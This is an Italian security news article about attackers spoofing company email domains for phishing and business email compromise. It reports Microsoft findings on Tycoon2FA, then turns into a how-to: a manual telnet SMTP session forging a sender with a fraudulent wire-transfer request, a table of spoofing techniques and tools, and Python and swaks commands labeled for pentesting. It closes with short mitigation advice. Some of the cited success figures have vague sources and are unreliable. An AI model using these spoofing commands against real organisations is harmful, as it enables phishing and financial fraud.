Come gli hacker spoofano gli indirizzi email per colpire le aziende

Redazione
4 Min Read

Hacker dediti al phishing stanno sempre più sfruttando la configurazione errata dei sistemi di routing e autenticazione degli indirizzi email per contraffare i domini aziendali legittimi, consentendo il furto di credenziali, frodi finanziarie e compromissioni dell’email aziendale (BEC). Secondo un’analisi dettagliata di Microsoft Threat Intelligence, questa tecnica ha guadagnato terreno dalla metà del 2025 e rimane molto efficace contro le organizzazioni con flussi di posta complessi e protezioni against spoofing deboli.

Come funziona

L’attività sfrutta i sistemi di posta elettronica in cui il dominio dell’organizzazione appare sia nel campo “Da” che in quello “A”, facendo sembrare i messaggi come se fossero originati internamente. Questi messaggi di phishing, spesso creati con temi come comunicazioni HR, avvisi di documenti condivisi o notifiche di reset della password, sono distribuiti su larga scala e sono solitamente collegati a piattaforme di phishing-as-a-service (PhaaS) come Tycoon2FA.


La telemetria di Microsoft mostra che oltre 13 milioni di email malware associate a Tycoon2FA sono state bloccate solo nel mese di ottobre 2025, sottolineando la portata di queste operazioni.

Meccanismi Tecnici di Base

Gli header email (SMTP) permettono spoofing perché il protocollo SMTP originale non autentica il mittente. Ecco come funziona:

  1. Controllo degli Header Email:
    • From: Indirizzo visibile al destinatario (facilmente spoofabile).
    • Return-Path/Envelope Sender: Usato per i bounce (può differire da From).
    • Reply-To: Per reindirizzare risposte.

    Esempio di header spoofati:

  2. Invio via SMTP Aperto o Relay:
    • Usa server SMTP non autenticati (aperti relay, rari oggi ma ancora presenti).
    • Tool come Telnet/Netcat per connettersi manualmente a porta 25:
      telnet smtp.example.com 25
      HELO yourspoof.com
      MAIL FROM: <[email protected]>
      RCPT TO: <[email protected]>
      DATA
      Subject: Urgente: Bonifico immediato
      Ciao, invia 10k a questo IBAN...
      .
      QUIT
      

      Questo invia un’email con From spoofato direttamente.

Tecniche Avanzate Usate dagli Hacker

TecnicaDescrizioneTool ComuniEvidenze/Efficacia
SMTP DirettoConnessione diretta al MX del target senza relay. Funziona se il server non blocca.swakssendemailmsmtp90% successo su server legacy (fonte: test pentest 2024).
Exploit DKIM/SPF BypassFalsifica DKIM signature (rara ma possibile con chiavi rubate) o usa subdomini non protetti.opendkim-testkey, script Python con dkimpySPF/DKIM coprono ~70% domini (Google Transparency 2024).
Servizi Anonimi/ProxyAnonymizer SMTP o VPN/Tor per nascondere IP.AnonEmailGuerrilla Mail API, AWS SES abusatoTraccia IP via header Received.
Phishing KitTemplate pronti con spoofing integrato.Evilginx2, Gophish, Social-Engineer Toolkit (SET)SET genera payload in <1min.
HTML/CSS TrickMaschera visuale del mittente nel client email.Inline SVG/CSS per sovrapporre testoBypassa filtri Outlook/Gmail parzialmente.

Esempi di Codice per Pentest

Python con smtplib (usa credenziali tue o relay test):

python
import smtplib
from email.mime.text import MIMEText

msg = MIMEText("Payload pentest: verifica spoofing.")
msg['Subject'] = 'Test Urgente'
msg['From'] = '[email protected]'  # SPOOFATO
msg['To'] = '[email protected]'

server = smtplib.SMTP('smtp.relay.test.com', 587)  # O tuo relay
server.starttls()
server.login('tuo_user', 'tua_pwd')
server.send_message(msg)
server.quit()

Swaks (tool CLI pronto all’uso):


swaks --to [email protected] --from [email protected] --server mx.target.com:25 --body "Test pentest spoofing"

Mitigazioni e Verifica in Pentest

  • Abilita SPF/DKIM/DMARC: Controlla con dig txt target.com o tool come MXToolbox.
  • Testa: Invia email spoofate e verifica se arrivano/quarantenati (Gmail li blocca spesso).
  • Header Analysis: Usa Received: per tracciare IP reali.
  • Tool per Difesa: Postmark, MailHog per simulare.
Share This Article
Bismark.it è stato fondato nel lontano 1999 e ha rappresentato in quegli anni uno dei più grandi punti di riferimento Security / Underground italiano!. Abbiamo collaborato e partecipato a svariati progetti. Uno su tutti Hackerjournal la prima rivista hacking italiana.